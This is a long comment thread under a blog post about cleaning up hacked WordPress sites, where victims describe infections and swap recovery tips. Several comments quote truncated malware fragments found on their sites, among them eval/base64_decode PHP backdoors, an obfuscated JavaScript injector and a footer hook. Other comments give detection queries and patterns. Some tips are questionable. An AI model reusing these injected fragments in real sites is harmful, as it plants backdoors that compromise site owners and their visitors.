    Other Note to self: once you’re done editing theme and plugin files, set file permissions back to 755 for god’s sake!

    Thanks for the article ;-)


  80. Some great information here, many thanks to all.

    I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.

    Luckily, everytime i’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.

    john.


  81. We also got hit :-(

    Our press release section got screwed over by the hacker.

    We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611

    Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.


  82. Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.

    BTW…love the WP-Supercache plugin. Thanks!!!


  83. I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.

    There doesn’t appear to be anything wrong with the site or pages but here is the code:

    SELECT *
    FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
    WHERE (
    `option_id` LIKE ‘%base64_decode%’
    OR `blog_id` LIKE ‘%base64_decode%’
    OR `option_name` LIKE ‘%base64_decode%’
    OR `option_value` LIKE ‘%base64_decode%’
    OR `autoload` LIKE ‘%base64_decode%’
    )
    LIMIT 0 , 30

    Am I ok.. or did something happen?


  84. Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.

    Any suggestions as to where to look? Please help!!!!!!

    Thanks,


  85. Hi there :)) Looking desperatetly for help :) I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you :))


  86. My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to to click the default permalink structure again and click save changes, now your posts should be working again, mine start working again.

    I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.


  87. Thank you for all these useful informations. Unfortunately it`s a matter of time until a WordPress blog will be attacked by hackers, in a form or other. The main rule is a constantly DB backup. Upgrade your WP and the plugins when it`s possible, try to protect as much you can, in this article you can find useful details, but don`t forget, secure your important dates by regular backups.


  88. For the sake of helping of course, i want to say something else.

    When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?

    But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.

    If you go to the theme editor in the appereance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code in to the files you just change permissions to writable.

    Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, beleave me, i really informed myself on this, delete it and deactive the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.

    Hope i helped.


  89. Several of my sites were exploited some a hacker recently. As far as I am aware the hack used the wordpress php vunrability to gain access to my server and rather than creating havoc with wordpess files appears to have defaced one of my html sites by deleting the home page and uploading his or hers own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! changed all passwords, ftp,admin,sql and any other I could think off! it really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so its a good deterrent.


  90. As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.

    Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.

    Henceforth, I thought I was running with WP 2.8.4.

    That is, until yesterday!

    cPanel – Fantastico | WordPress

    displayed in RED upgrade now to WP 2.8.4

    Shock horror!

    Install by Fantastico and it controls WordPress.

    Upgrades by WP WordPress do not update.

    Warning:

    WordPress upgrades – immediate.

    Fantastic WP upgrades – timing delay, therefore, security risk.

    My site been hacked.


  91. My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1″); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.


    1. THank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
      I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
      Then i changed my WP name/password.
      But the links came back a week later.
      Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
      ROSACEA:
      How do i know what is safe to delete??
      I feel like I am flying blind.

      Any other tips will be appreciated.


        1. Hi Donncha-
          Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!

          I’ve also deleted fake users and some odd user metadata.
          Now, i ran your Exploit Plug in and this:
          <?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
          …plus a bunch of script comes up in what appears to be every plug in.

          It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
          Lisa


  92. Site was hacked yesterday…..
    The code at the bottom of this reply was added to several php files and script.js files.
    I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
    I hope it is all clean now but know I have to do more to prevent this from happening again.

    I am so annoyed that there are idiots spoiling peoples fun of setting up a website!

    Thanks for the tips mentioned above it helped me getting the site back up and running, but still trying to find better security to prevent this from happening again.

    Any tips are welcome!

    /*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement(‘script’);X08yhffhg7xkxf.setAttribute(‘type’, ‘text/javascript’);X08yhffhg7xkxf.setAttribute(‘id’, ‘myscript1′);X08yhffhg7xkxf…. etcetr you get the point


    1. Thanks, this script is brilliant. Still getting hacked regularly so I haven’t solved the underlaying problem but by running your script teh site is up most of the time, I am setting up a new site ,with all new usernames and passwords.
      Had to reinstall my pc as well because it got infected :-(


  93. My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com


    1. Ed – didn’t you read the entire article?

      It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.

      I would do it with next steps:
      1. backup entire mySql database to local computer
      2. delete mySql database and create new mySql database
      3. restore tbles from local backup
      4. check tables for users and change passwords (hacker might have old passwords)
      5. create clean install od latest wordpress
      6. upgrade data in mysql as needed

      Hope this helps…


      1. I’m still not clear on this… if I delete the DB then upload the one I backe up, won’t it contain the fake users still?


  94. like many ive had not only a wordpress site hacked but then my server and not for the first time. yes i backup but thats not the point.

    its come to a point were i changes hosts which took time and money


    1. Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?


  95. Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?


  96. Thanks so much for the advice it came in very handy.

    In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.

    It blocked me..

    1. I couldn’t perform from Firefox a simple view source code
    2. Even with “NoScript” on full alert
    3. Every time I would try, it would try to give me a Trojan.
    4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
    5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.

    Thanks again so much for your help.


  97. Donncha,
    I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :

    Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121

    I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.

    Peace,
    Madhu
    INDIMAG.com


    1. “Disk quota exceeded” – your disk is full.

      Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.


      1. Donncha,
        I know of the NSF but to get local it’s costs and I’m living with it.

        On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…


        1. My hosting company is just telling using that disk usage report and saying it cannot be the disk, ought to be the plug in ..


  98. Hi Donnoha,
    You’ve given really great information here and I will definitely apply it. I only have one problem: cant even get into the back end of my blog!! Do you have any suggestions?

    When i try to go in with firefox, my antivirus comes up with the Mal/iframe-f If i try to go in with IE it doesnt let me even get near the blog front end or backend.

    once i log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. do you ever do paid work?

    (coz I am at my wits end and i dont have enough knowledge of php to know what to delete and what not to)

    i have upgraded, added exploit, have manually looked through files for obvious iframes (didnt look for the rest of the code you’ve revealed here though).
    have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!

    any advice is appreciated

    Please let me know about the paid thing

    Thanks
    Gaylea


  99. I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…

    One is called WordPress Firewall. It basically protects your WordPress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pro’s: Closes another door or two in the face of hackers. Con’s: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)

    Another is WordPress Antivirus. This basically scans your theme files for injected type code. Tho not full proof, it does add another layer of possible protection.

    I also use WordPress Scanner to scan my installation for security holes.

    Just Google any of these names and the word “wordpress” or “plugin” at the same time.

    And remember, the safety of your blog and your visitors is in your hands… get proactive.


  100. I use WPMU and Love WordPress !! I Had 13 sites totaling 4000+ “Real”members,and with in a few hours I had 10,000+Fake members all mixed in !And no sites ! most of the Fake blogs and user emails I noticed (later) were short first name sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
    I Also found a theme with files all cute and pretty :{ with images labeled as alott of the codes you mention above, theme was named flavour-extended-png in the themes folder, I am almost sure it is infected.Thank you for all the help wordpress world :)

    Keep the Faith :)


  101. Ok First up.

    1. I have 5 wordpress sites all got hacked into during March. The first one http://www.vincecianci.com is reported as an attack site and supposedly has malware on it. The google message appears upon trying to load the site. The same thing has happened on my other sites too.

    2. I cant access ANY of my sites though the standard wordpress login page as If my own passwords have been changed.

    3. I am not tech savy at all. I checked most of my files on each of the 5 wordpress sites and it appears ok to me but what do I know. I have zero php, ftp experience. My hosting provider GoDaddy cant do anything so I feel I am out of options.

    Any ideas here guys??

    Vince.


  102. The following is a common hack, but I can not seem to find the common fix.

    .:: HACKED By R3YR3 ::. | r3yr3[dot]m4iL[at]gmail[dot]com |


  103. If a person’s site is still being hacked, till you can find another way to keep them out, you should be the only one going in and only from home – one place. Do google searches and learn about htaccess files. then, if possible, make use of them.

    To keep everyone but you out of admin, make sure no one but you knows your FTP password. Change it before you do anything else, and again afterwards. Several ftp id’s and pw’s can be created by a hacker once he is in. Go to your cPanel (?) and make sure that there are none created that you do not know about – probably none. period. If a hacker can get in with ftp, they can shoot down your htaccess file also.


  104. My site was hacked today. I have this code:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9");

    at the top of all of my PHP files.

    I think I need to do a complete re-install. I don't have the WordPress folder backed up, but I do have a clean back of my database. So, can I just delete my current installation and database, install a new wordpress and then restore the database? Or is it more complicated?

    Thanks


  105. please add that the theme files could be chaged that was so in my case so i did disinstalled the theme reinstalled it agasin and that worked fiine for me


  106. I have noticed in the past that that base64 code shows up in freeware WP templates. So, beware what templates you pick, the “backdoor” hacker code may already be in an otherwise innocent template and will leave the back gate open to your blog once you install it.


  107. Hello from Germany! May i quote a post a translated part of your blog with a link to you? I’ve tried to contact you for the topic Did your WordPress site get hacked?, but i got no answer, please reply when you have a moment, thanks, Gedicht


  108. Seriously that exploit tool was INVALUABLE to me!!! THANK YOU SOOOOOOOO much!!!!!!! I’ve been working on an issue for months, and I was finally able to resolve it with your tool. Thank you again!


  109. My website has wordpress on it, and it got hacked, and everything was stolen, and destroyed! i looked at a page, and code was everywhere!!!

    My SQL dbs all have been screwed up! so now i am sad


  110. Regarding Exploit Scanner .95:

    This thing was nothing but a headache for me. I had to change the files from 50 to 40 to avoid memory problems. After spending several hours scanning 18,000 files, there was silence. Nothing say good or bad.

    On top of that, it increased my database options table from 1 mb to 800 mb. Yes you read that right. 1 mb to 800 mb by adding records that don’t get deleted even when the plugin is deativated. I only noticed it when I tried to backup my database for upgrade to WP3.0. I had to use phpMyadmin to search for all the records and delete them and then repair the database to regain the empty space. It’s not something for the faint of heart.

    If you’re going to try this, backup your database first and check the size afterward.


  111. I countered a problem, in which if i search my blog via google or any search engines, if i click the link ill be redirected to another site.

    Thanks to this article, i kinda got by eval(), which has been stated and also i hvent seen that part in my wp config when i installed my wordpress blog.

    So i deleted it and its working fine now. Thank you so much.

    God speed..:)


  112. Donncha,
    A blog site of mine of got nailed around 4 weeks ago.
    Completely pissed me off. the DB was deleted and my wordpress theme screwed up by some fecker.

    I actually think that the scumbag got in via a issue with filezilla FTP (I have my password booked marked with this program).

    Anyway, lots of tear drops.
    Thanks for sharing your article.


  113. Hi

    I have study you list carefully because someone has attach my website. I can find any malware. My database looks find and I can not find the hidden code you are writing about.

    I is strange they can change my title line in search engine but not in my code.


  114. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    And if they put a backdoor file in cache/ and modify the .htaccess to being able to access it later ? Untraceable.


    1. Yup, then you’re screwed. I disabled AIDE a long time ago. The daily emails were too full of things I didn’t care about to look at them every day.


  115. We suspect that a friend of mine’s WordPress site got hacked. Every time you type in his domain name without the www. in front, it redirects to default.com. Any ideas why this is?


  116. I have a static site and do not blog so all i have to do even if the backups are messed up is to make the page/child structure, add the childs CSS, add the HTML from saved notepad files and images and i am off.

    I feel sorry for people that have to trawl through 3000 pages of crap to filter stuff out. I only download from the official repository and nowhere else. I keep WP up to date even if it breaks my site and then fix the pages. I use most of teh security related plugs as wel even though they scare me just as much


  117. I got this page as first result from searching on xmlrpc.php
    Because some kid was trying to hack my site …
    I notice his weird query for xmlrpc.php file in WassUp visitor history
    First i Block him From .htaccess File
    any way he failed in hes hack attempt ..
    I use WP 3.0.1


  118. Hello,

    PLEASE HELP ME! I have a site running in WP. Recently when I visit it, I get a ‘Malware found’ page. Also when I access the Dashboard, I get some ‘Http:… blah blah’ message at the top, outside the theme. I can’t even download the XML export so that I can update to 3.0.5 as my site runs on 3.0.1. The plugins I had installed were Wassup stats, Akismet, W3 total cache, Fancy pull quotes, News and events, Notices plugin. I’m using Atahualpa theme 4.9.
    Please help me get the malware out!


  119. I don’t know if my blog was hacked but one of my blog suddenly no post. All of my post gone. Can you tell me, if this kind of hack?


  120. Thank you very much for these tips on securing your WP site, I’ll definitely use tripwire and a couple other tools to try to secure the site. Again thank you very much for your time writing this blog.

    Pete


  121. I donncha,

    Do you have any idea why some of my plugins are not showing on my admin dashboard although they are installed on my plugins folder? Two of these plugins are (wp super cache and wordpress security scan).. Also, I can no longer install plugin through the wordpress admin.. Any help would be appreciated..

    thanks,
    joliber


  122. - Installed the latest WP-Version 3.2.1 with the theme 2011.
    - Went to
    http://sitecheck.sucuri.net/scanner/
    and made the security scan:

    - Result was, that they showed the internal path
    Wordpress internal path: /internal_path/wordpress/wp-content/themes/twentyeleven/index.php
    - That means that all the people can see my database username.

    How do I avoid that?


  123. I’ve been hacked five times this year and after finally transferring to a new host, I’ve been uploading my old files and databases. Now I’m seriously reconsidering starting from scratch. That seems so much safer since scripts could be left in some of my files right? Sigh


  124. dude your post just saved me from having a heart attack!! thanks a million. My site got hacked. I didn’t updated my wordpress but I was able to enter my dashboard from there I quickly updated to 3.3 and phew that was a relief!

  125. Pingback: | SeoFuturity

  126. I’m searching by date, to determine unauthorised file modifications.
    `find $HOME -type f -mtime -30`
    Does a search for all files modified less than 30 days ago. Are crackers/hackers known for using `touch` to modify timestamps? or is date scanning a suitable technique?


  127. Phew my sites attacked again . and they upload phising script to my sites. Can I know where the backdoor using your Exploit Scanner plugin ?


  128. Não consigo alterar permissão de escrita e leitura para a pasta “wp-admin” depois de ser atacado… tem como resolver isso?


  129. Thank you!! Seriously, you just saved my bacon. with this post I was back up and looking good in less than an hour, while on a conference call the whole time.


  130. my site also get hacked and they inject some script to functon.php like this

    <? Php add_action ('get_footer', 'add_sscounter'); function add_sscounter () {echo' ‘; if (function_exists (‘ is_user_logged_in ‘)) {if (time ()% 2 == 0 & &! is_user_logged_in ()) {echo ”
    }}}?>

    I has clean up my site and hope it’s not happen again with my site.


  131. Don’t forget to change your FTP & WordPress passwords. We are seeing a lot of websites getting hacked from personal pcs getting infected directly via FTP. Then the hacker uploads a shell script (a back door). Look for a back door if you’ve been hacked. Use at least 12 random characters. We recommend that you use a password generator. Hope that helps.


  132. Thank for all these info. but what if they change cPanel password.
    because my cPanel is also not opening.


  133. You might find this amusing, My SonicWall blocks attempts to visit (this post only) unless I (temporarily) add your ip address to the list of ups not to scan for virus. Here’s the message I get:

    Gateway Anti-Virus Alert

    This request is blocked by the SonicWALL Gateway Anti-Virus Service. If you feel this message is an error, please contact your IT Support staff. Name: Suspicious#gumblar_5 (Trojan)

Leave a Reply

Loading Facebook Comments ...